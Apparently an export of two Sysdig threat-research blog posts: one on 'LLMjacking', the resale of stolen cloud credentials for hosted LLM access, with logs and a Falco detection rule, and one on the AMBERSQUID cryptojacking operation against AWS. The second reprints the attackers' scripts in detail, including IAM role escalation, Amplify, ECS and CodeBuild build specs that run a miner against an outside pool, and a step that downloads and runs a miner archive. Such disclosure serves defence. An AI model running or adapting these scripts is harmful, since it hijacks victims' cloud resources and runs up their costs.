Sysdig | Alessandro Brucato https://sysdig.com/blog/author/alessandro-brucato/ Tue, 21 May 2024 15:54:02 +0000 en-US hourly 1 https://wordpress.org/?v=6.6.1 https://sysdig.com/wp-content/uploads/favicon-150x150.png Sysdig | Alessandro Brucato https://sysdig.com/blog/author/alessandro-brucato/ 32 32 LLMjacking: Stolen Cloud Credentials Used in New AI Attack https://sysdig.com/blog/llmjacking-stolen-cloud-credentials-used-in-new-ai-attack/ Mon, 06 May 2024 18:02:09 +0000 https://sysdig.com/?p=88386 The Sysdig Threat Research Team (TRT) recently observed a new attack that leveraged stolen cloud credentials in order to target...

The post LLMjacking: Stolen Cloud Credentials Used in New AI Attack appeared first on Sysdig.

]]>
The Sysdig Threat Research Team (TRT) recently observed a new attack that leveraged stolen cloud credentials in order to target ten cloud-hosted large language model (LLM) services, known as LLMjacking. The credentials were obtained from a popular target, a system running a vulnerable version of Laravel (CVE-2021-3129). Attacks against LLM-based Artificial Intelligence (AI) systems have been discussed often, but mostly around prompt abuse and altering training data. In this case, attackers intend to sell LLM access to other cybercriminals while the cloud account owner pays the bill.

Once initial access was obtained, they exfiltrated cloud credentials and gained access to the cloud environment, where they attempted to access local LLM models hosted by cloud providers: in this instance, a local Claude (v2/v3) LLM model from Anthropic was targeted. If undiscovered, this type of attack could result in over $46,000 of LLM consumption costs per day for the victim.

Sysdig researchers discovered evidence of a reverse proxy for LLMs being used to provide access to the compromised accounts, suggesting a financial motivation.  However, another possible motivation is to extract LLM training data. 

Breadth of Targets

We were able to discover the tools that were generating the requests used to invoke the models during the attack. This revealed a broader script that was able to check credentials for ten different AI services in order to determine which were useful for their purposes. These services include:

  • AI21 Labs, Anthropic, AWS Bedrock, Azure, ElevenLabs, MakerSuite, Mistral, OpenAI, OpenRouter, and GCP Vertex AI

The attackers are looking to gain access to a large amount of LLM models across different services. No legitimate LLM queries were actually run during the verification phase. Instead, just enough was done to figure out what the credentials were capable of and any quotas. In addition, logging settings are also queried where possible. This is done to avoid detection when using the compromised credentials to run their prompts.

Background

Hosted LLM Models

All major cloud providers, including Azure Machine Learning, GCP’s Vertex AI, and AWS Bedrock, now host large language model (LLM) services. These platforms provide developers with easy access to various popular models used in LLM-based AI. As illustrated in the screenshot below, the user interface is designed for simplicity, enabling developers to start building applications quickly.

These models, however, are not enabled by default. Instead, a request needs to be submitted to the cloud vendor in order to run them. For some models, it is an automatic approval; for others, like third-party models, a small form must be filled out. Once a request is made, the cloud vendor usually enables access pretty quickly. The requirement to make a request is often more of a speed bump for attackers rather than a blocker, and shouldn’t be considered a security mechanism. 

Cloud vendors have simplified the process of interacting with hosted cloud-based language models by using straightforward CLI commands. Once the necessary configurations and permissions are in place, you can easily engage with the model using a command similar to this:

aws bedrock-runtime invoke-model –model-id anthropic.claude-v2 –body ‘{“prompt”: “\n\nHuman: story of two dogs\n\nAssistant:”, “max_tokens_to_sample” : 300}’  –cli-binary-format raw-in-base64-out  invoke-model-output.txt

LLM Reverse Proxy

The key checking code that verifies if credentials are able to use targeted LLMs also makes reference to another project: OAI Reverse Proxy. This open source project acts as a reverse proxy for LLM services. Using software such as this would allow an attacker to centrally manage access to multiple LLM accounts while not exposing the underlying credentials, or in this case, the underlying pool of compromised credentials. During the attack using the compromised cloud credentials, a user-agent that matches OAI Reverse Proxy was seen attempting to use LLM models.

LLM Jacking Attack

The image above is an example of an OAI Reverse Proxy we found running on the Internet. There is no evidence that this instance is tied to this attack in any way, but it does show the kind of information it collects and displays. Of special note are the token counts (“tookens”), costs, and keys which are potentially logging.

LLMJacking Attack

This example shows an OAI reverse proxy instance, which is setup to use multiple types of LLMs. There is no evidence that this instance is involved with the attack. 

If the attackers were gathering an inventory of useful credentials and wanted to sell access to the available LLM models, a reverse proxy like this could allow them to monetize their efforts.

LLMJacking Attack

Technical Analysis

In this technical breakdown, we explore how the attackers navigated a cloud environment to carry out their intrusion. By employing seemingly legitimate API requests within the cloud environment, they cleverly tested the boundaries of their access without immediately triggering alarms. The example below demonstrates a strategic use of the InvokeModel API call logged by CloudTrail. Although the attackers issued a valid request, they intentionally set the max_tokens_to_sample parameter to -1. This unusual parameter, typically expected to trigger an error, instead served a dual purpose. It confirmed not only the existence of access to the LLMs but also that these services were active, as indicated by the resulting ValidationException. A different outcome, such as an AccessDenied error, would have suggested restricted access. This subtle probing reveals a calculated approach to uncover what actions their stolen credentials permitted within the cloud account.

InvokeModel

The InvokeModel call is logged by CloudTrail and an example malicious event can be seen below. They sent a legitimate request but specified “max_tokens_to_sample” to be -1. This is an invalid error which causes the “ValidationException” error, but it is useful information for the attacker to have because it tells them the credentials have access to the LLMs and they have been enabled. Otherwise, they would have received an “AccessDenied” error.

{

    "eventVersion": "1.09",

    "userIdentity": {

        "type": "IAMUser",

        "principalId": "[REDACTED]",

        "arn": "[REDACTED]",

        "accountId": "[REDACTED]",

        "accessKeyId": "[REDACTED]",

        "userName": "[REDACTED]"

    },

    "eventTime": "[REDACTED]",

    "eventSource": "bedrock.amazonaws.com",

    "eventName": "InvokeModel",

    "awsRegion": "us-east-1",

    "sourceIPAddress": "83.7.139.184",

    "userAgent": "Boto3/1.29.7 md/Botocore#1.32.7 ua/2.0 os/windows#10 md/arch#amd64 lang/python#3.12.1 md/pyimpl#CPython cfg/retry-mode#legacy Botocore/1.32.7",

    "errorCode": "ValidationException",

    "errorMessage": "max_tokens_to_sample: range: 1..1,000,000",

    "requestParameters": {

        "modelId": "anthropic.claude-v2"

    },

    "responseElements": null,

    "requestID": "d4dced7e-25c8-4e8e-a893-38c61e888d91",

    "eventID": "419e15ca-2097-4190-a233-678415ed9a4f",

    "readOnly": true,

    "eventType": "AwsApiCall",

    "managementEvent": true,

    "recipientAccountId": "[REDACTED]",

    "eventCategory": "Management",

    "tlsDetails": {

        "tlsVersion": "TLSv1.3",

        "cipherSuite": "TLS_AES_128_GCM_SHA256",

        "clientProvidedHostHeader": "bedrock-runtime.us-east-1.amazonaws.com"

    }

}

Example Cloudtrail log

AWS Bedrock is not supported in all regions so the attackers called “InvokeModel” only in the supported regions. At this time, Bedrock is supported in us-east-1, us-west-2, ap-southeast-1, ap-northeast-1, eu-central-1, eu-west-3, and us-gov-west-1, as shown here. Different models are available depending on the region; here is the list of models supported by AWS Region.

GetModelInvocationLoggingConfiguration

Interestingly, the attackers showed interest in how the service was configured. This can be done by calling “GetModelInvocationLoggingConfiguration,” which returns S3 and Cloudwatch logging configuration if enabled. In our setup, we used both S3 and Cloudwatch to gather as much data about the attack as possible. 

{

    "loggingConfig": {

        "cloudWatchConfig": {

            "logGroupName": "[REDACTED]",

            "roleArn": "[REDACTED]",

            "largeDataDeliveryS3Config": {

                "bucketName": "[REDACTED]",

                "keyPrefix": "[REDACTED]"

            }

        },

        "s3Config": {

            "bucketName": "[REDACTED]",

            "keyPrefix": ""

        },

        "textDataDeliveryEnabled": true,

        "imageDataDeliveryEnabled": true,

        "embeddingDataDeliveryEnabled": true

    }

}

Example GetModelInvocationLoggingConfiguration response

Information about the prompts being run and their results are not stored in Cloudtrail. Instead, additional configuration needs to be done to send that information to Cloudwatch and S3. This check is done to hide the details of their activities from any detailed observations. OAI Reverse Proxy states it will not use any AWS key that has logging enabled for the sake of “privacy.” This makes it impossible to inspect the prompts and responses if they are using the AWS Bedrock vector.

Impact

In an LLMjacking attack, the damage comes in the form of increased costs to the victim. It shouldn’t be surprising to learn that using an LLM isn’t cheap and that cost can add up very quickly. Considering the worst-case scenario where an attacker abuses Anthropic Claude 2.x and reaches the quota limit in multiple regions, the cost to the victim can be over $46,000 per day.

According to the pricing and the initial quota limit for Claude 2:

  • 1000 input tokens cost $0.008, 1000 output tokens cost $0.024.
  • Max 500,000 input and output tokens can be processed per minute according to AWS Bedrock. We can consider the average cost between input and output tokens, which is $0.016 for 1000 tokens.

Leading to the total cost: (500K tokens/1000 * $0.016) * 60 minutes * 24 hours * 4 regions = $46,080 / day

By maximizing the quota limits, attackers can also block the compromised organization from using models legitimately, disrupting business operations.

Detection

The ability to detect and respond swiftly to potential threats can make all the difference in maintaining a robust defense. Drawing insights from recent feedback and industry best practices, we’ve distilled key strategies to elevate your detection capabilities:

  • Cloud Logs Detections: Tools like Falco, Sysdig Secure, and CloudWatch Alerts are indispensable allies. Organizations can proactively identify suspicious behavior by monitoring runtime activity and analyzing cloud logs, including reconnaissance tactics such as those employed within AWS Bedrock. 
  • Detailed Logging: Comprehensive logging, including verbose logging, offers invaluable visibility into the inner workings of your cloud environment. Verbose information about model invocations and other critical activities gives organizations a nuanced understanding about activity in their cloud environments. 

Cloud Log Detections

Monitoring cloud logs can reveal suspicious or unauthorized activity. Using Falco or Sysdig Secure, the reconnaissance methods used during the attack can be detected, and a response can be started. For Sysdig Secure customers, this rule can be found in the Sysdig AWS Notable Events policy.

Falco rule:

- rule: Bedrock Model Recon Activity

  desc: Detect reconaissance attempts to check if Amazon Bedrock is enabled, based on the error code. Attackers can leverage this to discover the status of Bedrock, and then abuse it if enabled.

    condition: jevt.value[/eventSource]="bedrock.amazonaws.com" and jevt.value[/eventName]="InvokeModel" and jevt.value[/errorCode]="ValidationException"

    output: A reconaissance attempt on Amazon Bedrock has been made (requesting user=%aws.user, requesting IP=%aws.sourceIP, AWS region=%aws.region, arn=%jevt.value[/userIdentity/arn], userAgent=%jevt.value[/userAgent], modelId=%jevt.value[/requestParameters/modelId])

    priority: WARNING

In addition, CloudWatch alerts can be configured to handle suspicious behaviors. Several runtime metrics for Bedrock can be monitored to trigger alerts.

Detailed Logging

Monitoring your organization’s use of language model (LLM) services is crucial, and various cloud vendors provide facilities to streamline this process. This typically involves setting up mechanisms to log and store data about model invocations.

For AWS Bedrock specifically, users can leverage CloudWatch and S3 for enhanced monitoring capabilities. CloudWatch can be set up by creating a log group and assigning a role with the necessary permissions. Similarly, to log into S3, a designated bucket is required as a destination. It is important to note that the CloudTrail log of the InvokeModel command does not capture details about the prompt input and output. However, Bedrock settings allow for easy activation of model invocation logging. Additionally, for model input or output data larger than 100kb or in binary format, users must explicitly specify an S3 destination to handle large data delivery. This includes input and output images, which are stored in the logs as Base64 strings. Such comprehensive logging mechanisms ensure that all aspects of model usage are monitored and archived for further analysis and compliance.

The logs contain additional information about the tokens processed, as shown in the following example:

{

    "schemaType": "ModelInvocationLog",

    "schemaVersion": "1.0",

    "timestamp": "[REDACTED]",

    "accountId": "[REDACTED]",

    "identity": {

        "arn": "[REDACTED]"

    },

    "region": "us-east-1",

    "requestId": "bea9d003-f7df-4558-8823-367349de75f2",

    "operation": "InvokeModel",

    "modelId": "anthropic.claude-v2",

    "input": {

        "inputContentType": "application/json",

        "inputBodyJson": {

            "prompt": "\n\nHuman: Write a story of a young wizard\n\nAssistant:",

            "max_tokens_to_sample": 300

        },

        "inputTokenCount": 16

    },

    "output": {

        "outputContentType": "application/json",

        "outputBodyJson": {

            "completion": " Here is a story about a young wizard:\n\nMartin was an ordinary boy living in a small village. He helped his parents around their modest farm, tending to the animals and working in the fields. [...] Martin's favorite subject was transfiguration, the art of transforming objects from one thing to another. He mastered the subject quickly, amazing his professors by turning mice into goblets and stones into fluttering birds.\n\nMartin",

            "stop_reason": "max_tokens",

            "stop": null

        },

        "outputTokenCount": 300

    }

}

Example S3 log

Recommendations

This attack could have been prevented in a number of ways, including:

  • Vulnerability management to prevent initial access.
  • Secrets management to ensure credentials are not stored in the clear where they can be stolen.
  • CSPM/CIEM to ensure the abused account had the least amount of permissions it needed.

As highlighted by recent research, cloud vendors offer a range of tools and best practices designed to mitigate the risks of cloud attacks. These tools help organizations build and maintain a secure cloud environment from the outset.

For instance, AWS provides several robust security measures. The AWS Security Reference Architecture outlines best practices for securely constructing your cloud environment. Additionally, AWS recommends using Service Control Policies (SCP) to centrally manage permissions, which helps minimize the risk associated with over-permissioned accounts that could potentially be abused. These guidelines and tools are part of AWS’s commitment to enhancing security and providing customers with the resources to protect their cloud infrastructure effectively. Other cloud vendors offer similar frameworks and tools, ensuring that users have access to essential security measures to safeguard their data and services regardless of the platform.

Conclusion

Stolen cloud and SaaS credentials continue to be a common attack vector. This trend will only increase in popularity as attackers learn all of the ways they can leverage their new access for financial gain. The use of LLM services can be expensive, depending on the model and the amount of tokens being fed to it. Normally, this would cause a developer to try and be efficient — sadly, attackers do not have the same incentive. Detection and response is critical to deal with any issues quickly. 

IoCs

IP Addresses

83.7.139.184

83.7.157.76

73.105.135.228

83.7.135.97

The post LLMjacking: Stolen Cloud Credentials Used in New AI Attack appeared first on Sysdig.

]]>
AWS’s Hidden Threat: AMBERSQUID Cloud-Native Cryptojacking Operation https://sysdig.com/blog/ambersquid/ Mon, 18 Sep 2023 11:00:00 +0000 https://sysdig.com/?p=79541 The Sysdig Threat Research Team (TRT) has uncovered a novel cloud-native cryptojacking operation which they’ve named AMBERSQUID. This operation leverages...

The post AWS’s Hidden Threat: AMBERSQUID Cloud-Native Cryptojacking Operation appeared first on Sysdig.

]]>
The Sysdig Threat Research Team (TRT) has uncovered a novel cloud-native cryptojacking operation which they’ve named AMBERSQUID. This operation leverages AWS services not commonly used by attackers, such as AWS Amplify, AWS Fargate, and Amazon SageMaker. The uncommon nature of these services means that they are often overlooked from a security perspective, and the AMBERSQUID operation can cost victims more than $10,000/day.

The AMBERSQUID operation was able to exploit cloud services without triggering the AWS requirement for approval of more resources, as would be the case if they only spammed EC2 instances. Targeting multiple services also poses additional challenges, like incident response, since it requires finding and killing all miners in each exploited service.

AMBERSQUID

We discovered AMBERSQUID by performing an analysis of over 1.7M Linux images in order to understand what kind of malicious payloads are hiding in the containers images on Docker Hub.

This dangerous container image didn’t raise any alarms during static scanning for known indicators or malicious binaries. It was only when the container was run that its cross-service cryptojacking activities became obvious. This is consistent with the findings of our 2023 Cloud Threat Report, in which we noted that 10% of malicious images are missed by static scanning alone.

With medium confidence, we attribute this operation to Indonesian attackers based on the use of Indonesian language in scripts and usernames. We also regularly see freejacking and cryptojacking attacks as a lucrative source of income for Indonesian attackers due to their low cost of living.

Technical Analysis

Docker Hub

The original container that initiated our investigation was found on Docker Hub, but the scope quickly expanded to include a number of accounts. Most of these accounts started with very basic container images running a cryptominer. However, they eventually switched over to the AWS-specific services described in this research.

Timeline

It is interesting to note that the first account was created in May 2022, and its development continued through August. The attackers continued pushing cryptominer images with different accounts until March 2023, when they created a GitHub account. Before creating their own repositories, making their operation a bit more evasive, the attackers downloaded miners from popular GitHub repositories and imported them into the layers of the Docker images. Their repositories don’t have any source code (yet) but they do provide the miners inside archives downloadable as releases. Those binaries are usually called “test,” packed with UPX and malformed so they cannot be easily unpacked.

AMBERSQUID

Below is the list of known Docker Hub users related to this operation. Some of the accounts seem to have been abandoned, while others continue to be active.

https://hub.docker.com/u/delbidaluan

https://hub.docker.com/u/tegarhuta

https://hub.docker.com/u/rizal91

https://hub.docker.com/u/krisyantii20

https://hub.docker.com/u/avriliahasanah

https://hub.docker.com/u/buenosjiji662

https://hub.docker.com/u/buenosjiji

https://hub.docker.com/u/dellaagustin582

https://hub.docker.com/u/jotishoop

https://hub.docker.com/u/krisyantii20

https://hub.docker.com/u/nainasachie

https://hub.docker.com/u/rahmadabdu0

https://hub.docker.com/u/robinrobby754

Malicious images from Docker Hub

If we dig deeper into delbidaluan/epicx, we discover a GitHub account that the attacker uses to store the Amplify application source code and the mining scripts mentioned above. They have different versions of their code to prevent being tracked by the GitHub search engine.

AMBERSQUID

For instance:

Before creating their Github account, the attacker used the cryptominer binaries without any obfuscation.

We have deduced that the images ending with “x” download the miners from the attackers’ repository releases and run them when launched, which can be seen in the layers. The epicx image, in particular, has over 100,000 downloads.

AMBERSQUID

The images without the final “x” run the scripts targeting AWS.

AWS Artifacts

Let’s begin with the artifact analysis using the container image delbidaluan/epic. The ENTRYPOINT of the Docker image is entrypoint.sh. All of the different images have the same format but can execute different scripts. In this case, the execution starts with the following:

#!/bin/bash

aws --version

aws configure set aws_access_key_id $ACCESS
aws configure set aws_secret_access_key $SECRET
aws configure set default.output text

git config --global user.name "GeeksforGeeks"
git config --global user.email "GFGexample@gmail.orgg"

They set up the AWS credentials with the environment variables or by passing them when deploying the image. Then, the GIT user and email are taken from the GeeksforGeeks example. The username exists on GitHub but with no activity.

The entrypoint.sh proceeds with the following scripts:

./amplify-role.sh
./repo.sh
./jalan.sh
./update.sh
./ecs.sh
./ulang.sh

Let’s explain each artifact and service the attacker is using to accomplish their cryptojacking operation.

Roles and permissions

The first script executed by the container, amplify-role.sh, creates the “AWSCodeCommit-Role” role. This new role is one of several used by the attacker throughout the operation as they add additional permissions for other AWS services. The first service, which is given access, is AWS Amplify. We will discuss the specifics around Amplify later in the article.

aws iam create-role --role-name AWSCodeCommit-Role --assume-role-policy-document file://amplify-role.json

Where amplify-role.json is:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Service": "amplify.amazonaws.com"
            },
            "Action": "sts:AssumeRole"
        }
    ]
}

Then, it attaches the full access policies of CodeCommit, CloudWatch, and Amplify to that role.

aws iam attach-role-policy --role-name AWSCodeCommit-Role --policy-arn arn:aws:iam::aws:policy/AWSCodeCommitFullAccess
aws iam attach-role-policy --role-name AWSCodeCommit-Role --policy-arn arn:aws:iam::aws:policy/CloudWatchFullAccess
aws iam attach-role-policy --role-name AWSCodeCommit-Role --policy-arn arn:aws:iam::aws:policy/AdministratorAccess-Amplify

Some inline policies are added as well:

aws iam put-role-policy --role-name AWSCodeCommit-Role --policy-name amed --policy-document file://amed.json
aws iam put-role-policy --role-name AWSCodeCommit-Role --policy-name ampad --policy-document file://ampad.json

These policies grant full privileges of Amplify and amplifybackend services to all resources.

Finally, amplify-role.sh creates another role, “sugo-role,” with full access to SageMaker, as shown below:

aws iam create-role --role-name sugo-role --assume-role-policy-document file://sugo.json
aws iam attach-role-policy --role-name sugo-role --policy-arn arn:aws:iam::aws:policy/AmazonSageMakerFullAccess

Where sugo.json is:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "Service": "sagemaker.amazonaws.com"
            },
            "Action": "sts:AssumeRole"
        }
    ]
}

In the same way, the ecs.sh script starts creating the role, “ecsTaskExecutionRole,” with full access to ECS, other than administrative privileges.

aws iam create-role --role-name ecsTaskExecutionRole --assume-role-policy-document file://ecsTaskExecutionRole.json
aws iam attach-role-policy --role-name ecsTaskExecutionRole --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws iam attach-role-policy --role-name ecsTaskExecutionRole --policy-arn arn:aws:iam::aws:policy/AmazonECS_FullAccess
aws iam attach-role-policy --role-name ecsTaskExecutionRole --policy-arn arn:aws:iam::aws:policy/service-role/AmazonECSTaskExecutionRolePolicy

[...]

Where ecsTaskExecutionRole.json is:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "",
      "Effect": "Allow",
      "Principal": {
        "Service": "ecs-tasks.amazonaws.com"
      },
      "Action": "sts:AssumeRole"
    }
  ]
}

CodeCommit

AWS CodeCommit is a secure, highly scalable, fully-managed source control service that hosts private Git repositories. The attackers used this service to generate the private repository which they then used in different services as a source. This allows their operation to stay fully contained within AWS.

The repo.sh script creates a CodeCommit repository named “test” in every region.

aws configure set region ca-central-1
aws codecommit create-repository --repository-name test

./code.sh

echo "selesai region ca-central-1"

Interestingly, “selesai” means “completed” in Indonesian.

Right after creating each, it executes code.sh which pushes via Git the source code of an Amplify app to the remote repository.

cd amplify-app
rm -rf .git
git init
git add .
git commit -m "web app"
git branch -m master
git status

git config --global credential.helper '!aws codecommit credential-helper $@'
git config --global credential.UseHttpPath true

git remote remove codecommit
REPO=$(aws codecommit get-repository --repository-name test --query 'repositoryMetadata.cloneUrlHttp'| tr -d '"' 2> /dev/null)
git remote add codecommit $REPO
git push codecommit master --force

Amplify

AWS Amplify is a development platform that allows developers to build and deploy scalable web and mobile applications. It provides a framework to integrate the app with multiple other AWS services, such as AWS Cognito for authentication, AWS AppSync for APIs, and AWS S3 for storage. Most importantly, Amplify provides the attacker access to compute resources.

Once the attackers created the private repositories, the next script jalan.sh executes another script, sup0.sh, in each region.

aws configure set region us-east-1
./sup0.sh
echo "selesai region us-east-1"

The sup0.sh script creates five Amplify web apps from the previously created repositories. The “amplify-app” directory present in code.sh includes the files needed to run their miners using Amplify, as some services do require file backing as seen here.

What follows is amplify.yml:

version: 1
frontend:
  phases:
    build:
      commands:
        - python3 index.py
        - ./time

  artifacts:
    baseDirectory: /
    files:
      - '**/*'

While this is the content of index.py:

import json
import datetime
import os
import time

os.system("./start")

def handler(event, context):
    data = {
        'output': 'Hello World',
        'timestamp': datetime.datetime.utcnow().isoformat()
    }
    return {'statusCode': 200,
            'body': json.dumps(data),
            'headers': {'Content-Type': 'application/json'}}

It runs the following start script, which executes the cryptominer:

nohup bash -c 'for i in {1..99999}; do ./test --disable-gpu --algorithm randomepic --pool 74.50.74.27:4416 --wallet rizal91#amplify-$(echo $(date +%H)) --password kiki311093m=solo -t $(nproc --all) --tls false --cpu-threads-intensity 1 --keep-alive true --log-file meta1.log; done' > program.out 2>&1 &

The “test” binary is a cryptominer, which was packed with UPX and malformed in order to make analysis more difficult. Also, it is undetected by VirusTotal. The results in Telemetry show that it was previously uploaded as “SRBMiner-MULTI”, which finds confirmation in the documentation related to Epic Cash mining:

./SRBMiner-MULTI --multi-algorithm-job-mode 1 --disable-gpu --algorithm randomepic --pool lt.epicmine.io:3334 --tls true --wallet your_username.worker_name --password your_passwordm=pool --keepalive true

We can assume that the attackers do this to avoid any downloads from outside the account’s own repository, thus avoiding possible alerts.

The other script they run in amplify.yml, named time, is used to make the build last as long as possible while the miner process is running:

for i in {1..6500000}
do
pgrep -x test;
sleep 3;
done

The attackers use their scripts to create several Amplify web apps to be deployed with Amplify Hosting. In the configuration file for the build settings, they inserted the commands to run a miner that is executed during the build phase of the app. The following code is part of sup0.sh script:

REPO=$(aws codecommit get-repository --repository-name test --query 'repositoryMetadata.cloneUrlHttp'| tr -d '"' 2> /dev/null)
IAM=$(aws iam get-role --role-name AWSCodeCommit-Role --query 'Role.Arn'| tr -d '"' 2> /dev/null)

for i in {1..5}
do
aws amplify create-app --name task$i --repository $REPO  --platform WEB  --iam-service-role-arn $IAM --environment-variables '{"_BUILD_TIMEOUT":"480","BUILD_ENV":"prod"}' --enable-branch-auto-build  --enable-branch-auto-deletion  --no-enable-basic-auth \
--build-spec "
version: 1
frontend:
  phases:
    build:
      commands:
        - timeout 280000 python3 index.py

  artifacts:
    baseDirectory: /
    files:
      - '**/*'

" \
--enable-auto-branch-creation --auto-branch-creation-patterns '["*","*/**"]' --auto-branch-creation-config '{"stage": "PRODUCTION",  "enableAutoBuild": true,  "environmentVariables": {" ": " "},"enableBasicAuth": false, "enablePullRequestPreview":false}'

The commands are then executed inside build instances: EC2 instances provided by AWS used to build the application.

For the first time, we discover attackers abusing AWS Amplify for cryptojacking.

It is also interesting to see how they enable auto-build, so that once the applications are created, the repo code is updated with the update.sh script so that they are deployed again.

Additionally, in another image (tegarhuta/ami) from a user who is part of the same pool, we discovered instructions for creating an Amplify app in the same folder where the cryptomining scripts were stored. One of the URLs is an Amplify app that appears to be running at the time of writing.

The site was hosted at `https://master[.]d19tgz4vpyd5[.]amplifyapp[.]com/.`

Elastic Container Service (ECS) / Fargate

The next script, ecs.sh, is obviously used to do cryptojacking in AWS ECS service. Amazon ECS is an orchestration service used to manage and deploy containers. Tasks and services are grouped in ECS clusters, which can run on EC2 instances, AWS Fargate (serverless), or on-premises virtual machines.

This script creates the “ecsTaskExecutionRole” role that can be assumed from the ECS tasks service. Then, it attaches the “AdministratorAccess”, “AmazonECS_FullAccess,” and “AmazonECSTaskExecutionRolePolicy” policies to it. This is the same process described above in the IAM section.

After that, it writes an ECS task definition where the image used to start the container is delbidaluan/epicx, a miner image belonging to the same Docker Hub user. The resources are set so that the container has 2 vCPu and 4 GB of memory. It is also configured to run on Fargate by setting the option “”requiresCompatibilities”: [ “FARGATE” ]”.

Then, for each region:

  • It creates an ECS cluster in Fargate
  • It registers the previous task definition
  • It queries the quota of Fargate On-Demand vCPU available and creates an ECS service according to that result:
    • If the quota equals 30.0, the “desiredCount” of the service is set to 30.
    • Otherwise, the “desiredCount” of the service is set to 6.
aws configure set region us-east-1

aws ecs create-cluster \
--cluster-name test \
--capacity-providers FARGATE FARGATE_SPOT \
--default-capacity-provider-strategy capacityProvider=FARGATE,weight=1 capacityProvider=FARGATE_SPOT,weight=1
sleep 10s
aws ecs create-cluster \
--cluster-name test \
--capacity-providers FARGATE FARGATE_SPOT \
--default-capacity-provider-strategy capacityProvider=FARGATE,weight=1 capacityProvider=FARGATE_SPOT,weight=1

aws ecs register-task-definition --family test --cli-input-json file://task.json

LIFAR=$(aws service-quotas get-service-quota --service-code fargate --quota-code L-3032A538 --query 'Quota.Value')
if [ $LIFAR = "30.0" ];
then
COUNT=30
VPC=$(aws ec2 describe-vpcs --query 'Vpcs[0].VpcId'| tr -d '"' 2> /dev/null)
SGROUP=$(aws ec2 describe-security-groups --filters "Name=vpc-id,Values=$VPC" --query 'SecurityGroups[0].GroupId' | tr -d '"' 2> /dev/null)
SUBNET=$(aws ec2 describe-subnets --query 'Subnets[0].SubnetId' | tr -d '"' 2> /dev/null)
SUBNET1=$(aws ec2 describe-subnets --query 'Subnets[1].SubnetId' | tr -d '"' 2> /dev/null)
aws ecs create-service --cluster test --service-name test --task-definition test:1 --desired-count $COUNT --capacity-provider-strategy capacityProvider=FARGATE,weight=1 capacityProvider=FARGATE_SPOT,weight=1 --platform-version LATEST --network-configuration "awsvpcConfiguration={subnets=[$SUBNET,$SUBNET1],securityGroups=[$SGROUP],assignPublicIp=ENABLED}"

else
COUNT=6
VPC=$(aws ec2 describe-vpcs --query 'Vpcs[0].VpcId'| tr -d '"' 2> /dev/null)
SGROUP=$(aws ec2 describe-security-groups --filters "Name=vpc-id,Values=$VPC" --query 'SecurityGroups[0].GroupId' | tr -d '"' 2> /dev/null)
SUBNET=$(aws ec2 describe-subnets --query 'Subnets[0].SubnetId' | tr -d '"' 2> /dev/null)
SUBNET1=$(aws ec2 describe-subnets --query 'Subnets[1].SubnetId' | tr -d '"' 2> /dev/null)
aws ecs create-service --cluster test --service-name test --task-definition test:1 --desired-count $COUNT --capacity-provider-strategy capacityProvider=FARGATE,weight=1 capacityProvider=FARGATE_SPOT,weight=1 --platform-version LATEST --network-configuration "awsvpcConfiguration={subnets=[$SUBNET,$SUBNET1],securityGroups=[$SGROUP],assignPublicIp=ENABLED}"
fi

According to the documentation, the desiredCount is “the number of instantiations of the specified task definition to place and keep running in your service. If the number of tasks running in a service drops below the desiredCount, Amazon ECS runs another copy of the task in the specified cluster.”

The final entrypoint script, ulang.sh, runs restart.sh for every region. This script simply queries all the jobs of all the Amplify apps and, if their status is different from “RUNNING” and “PENDING,” it re-runs them.

Codebuild scripts

AWS CodeBuild is a continuous integration (CI) service that can be used to compile and test source code and produce deployable artifacts without managing build servers. When creating a project, users can specify several settings in the build specification, including build commands.

This is where the attackers put the command to run their miner.

aws configure set region ap-south-1
aws codebuild create-project --name tost \
[...]

aws codebuild create-project --name tost1 \
[...]

aws codebuild create-project --name tost2 \
--source '{"type": "CODECOMMIT","location": "https://git-codecommit.ap-south-1.amazonaws.com/v1/repos/test","gitCloneDepth": 1,"gitSubmodulesConfig": {    "fetchSubmodules": false},"buildspec": "version: 0.2\nphases:\n  build:\n    commands:\n      - python3 index.py\n      - ./time","insecureSsl": false}' \
--source-version refs/heads/master \
--artifacts '{"type": "NO_ARTIFACTS"}' \
--environment '{"type": "LINUX_CONTAINER","image": "aws/codebuild/amazonlinux2-x86_64-standard:4.0","computeType": "BUILD_GENERAL1_LARGE","environmentVariables": [],"privilegedMode": false,"imagePullCredentialsType": "CODEBUILD"}' \
--service-role $ROLE_ARN \
--timeout-in-minutes 480 \
--queued-timeout-in-minutes 480 \
--logs-config '{"cloudWatchLogs": {"status": "ENABLED"},"s3Logs": {"status": "DISABLED","encryptionDisabled": false}}'


aws codebuild start-build --project-name tost1
aws codebuild start-build --project-name tost2
aws codebuild start-build --project-name tost

As shown above, attackers create three new projects in each region with the previously created repository and run the index.py when the project starts building. As for Amplify, the malicious code is executed inside build instances. The previous code snippet shows the specifications of the build, the OS, the Docker image to be used, its compute type, and information about the logs of the build project — in this case, CloudWatch.

Also, they set the “timeout-in-minutes” to 480 (8 hours). This parameter, according to the documentation, specifies “how long, in minutes, from 5 to 480 (8 hours), for CodeBuild to wait before it times out any build that has not been marked as completed.”

CloudFormation

AWS CloudFormation is an infrastructure as code service that allows users to deploy AWS and third-party resources via templates. Templates are text files that describe the resources to be provisioned in the AWS CloudFormation stacks. Stacks are collections of AWS resources that can be managed as single units. This means that users are able to operate directly with the stack instead of the single resources.

The attackers’ scripts create several CloudFormation stacks that originated from a template that defines an EC2 Image Builder component. Within this component, they put commands to run a miner during the build phase of the image. This is similar to the commands that can be defined in a Dockerfile.

For each region, it creates a CloudFormation stack where they insert the commands to run the miner inside the ImageBuilder Component:

Component:
    Type: AWS::ImageBuilder::Component
    Properties:
      Name: HelloWorld-ContainerImage-Component
      Platform: Linux
      Version: 1.0.0
      Description: 'This is a sample component that demonstrates defining the build, validation, and test phases for an image build lifecycle'
      ChangeDescription: 'Initial Version'
      Data: |
        name: Hello World
        description: This is hello world compocat nent doc for Linux.
        schemaVersion: 1.0

        phases:
          - name: build
            steps:
              - name: donStep
                action: ExecuteBash
                inputs:
                  commands:
                    - sudo yum install wget unzip -y && wget --no-check-certificate https://github.com/meuryalos/profile/releases/download/1.0.0/test.zip && sudo unzip test.zip
          - name: validate
            steps:
              - name: buildStep
                action: ExecuteBash
                inputs:
                  commands:
                    - sudo ./start
                    - sudo timeout 48m ./time
